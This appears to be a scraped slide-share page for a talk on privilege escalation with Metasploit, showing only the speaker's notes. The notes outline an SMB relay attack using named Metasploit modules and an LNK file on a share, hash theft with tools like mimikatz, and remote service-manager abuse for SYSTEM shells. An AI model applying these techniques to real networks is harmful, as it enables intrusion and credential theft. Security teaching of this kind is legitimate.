Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 

Privilege Escalation with Metasploit

Editor's Notes

  1. I’m egypt. I like Comic Sans and I don’t care who knows it
  2. I’m not Egypt
  3. I’ve never used my beard to take over a country. But I'm working on it.
  4. I work on a really cool project that makes it easier to get shells. Metasploit was created in 2003, I started using it circa 2004, started contributing in 2007. HDM gave me commit access in April 2008, we released 3.2 under a BSD license in October 2008. Acquired by Rapid7 in Oct 2009. Currently 10 full-time employees on the Metasploit. Literally hundreds of contributors. Metasploit is a framework, first and foremost. It's not just a bunch of exploits, it's everything you need to write exploits; it's a clearinghouse for compromised machines; it's a means of automating reconnaissance, compromise, post-compromise, and pivoting.
  5. 3 main reasons
  6. First, It's already great at getting shells. We have nearly a thousand exploits and support dozens of protocols.
  7. OSS. I mention this every chance I get because I think it’s worth repeating. You have the source code. It’s BSD-licensed. It’s pretty darned easy to write your own stuff to work with it. Ruby is an easy language to learn and even if you don’t like Ruby because you love terrorists and hate freedom, it’s easy to interface with RPC. If you write something awesome that you want the world to see, getting it in the Metasploit trunk gives you an instant userbase of over 150,000 hackers.
  8. Lastly, it's usually faster and easier to write Ruby vs C. Sometimes you have to hand-assemble a payload, sometimes you can save hours by writing it in C. Ruby can save you even more. When you have to get down and dirty, you can use metasm to write C or assembly.
  9. This should be fairly obvious, root is better than no privs, but why?
  10. In general higher privileges give you more options. More places to hide, more
  11. Can also include Auxiliary and Exploit mixins, of course.
  12. Lots of public exploits exist for this bug, discovered by Tavis Ormandy and Julien Tinnes. spender did a lot to publicize, rcvalle wrote a version for PPC. It's interesting in part because it effects a wide range of kernel versions: 2.4.4 -> 2.4.37.4 and 2.6.0 -> 2.6.30.4 That's all kernels from May 2001, through August 2009.
  13. This is a well-known attack. I'll explain it briefly to give you some background.
  14. If Victim is Local Admin on Target, you can get a SYSTEM shell via psexec.
  15. It used to be even more useful before ms08-068, which broke the ability to relay back to the victim. Coffee shops and airports were overflowing with free shells. A good time was had by most.
  16. Create an LNK file on a share you have access to, post/windows/escalate/droplnk Set up exploit/windows/smb/smb_relay pointing at Target Go get coffee while you wait for an Admin to look at the file share.
  17. The first point is how WCE, mimikatz, fgdump, et al can grab password hashes out of memory. That's still important, but if you don't need the hash to authenticate (since you're already authenticated), why bother uploading a tool that will get caught by AV? Much better to use built-in Windows functionality.
  18. "lpMachineName [in, optional] The name of the target computer. If the pointer is NULL or points to an empty string, the function connects to the service control manager on the local computer." If you provide a hostname/address here, does the normal NTLM authentication song and dance and lets you transparently modify the remote service system.
  19. "lpBinaryPathName [in, optional] If you specify a path on another computer, the share must be accessible by the computer account of the local computer because this is the security context used in the remote call. However, this requirement allows any potential vulnerabilities in the remote computer to affect the local computer. Therefore, it is best to use a local file." Most places in Windows that expect a path can take a UNC path which will cause Windows to transparently authenticate to whatever host you specify.
  20. I struggled a bit with where to put this module. It requires a payload, so it's an exploit. It requires a session so it's a post. Good candidate for Exploit::Local, but it's really a remote. And exploit/windows/local/remote/ is a bit awkward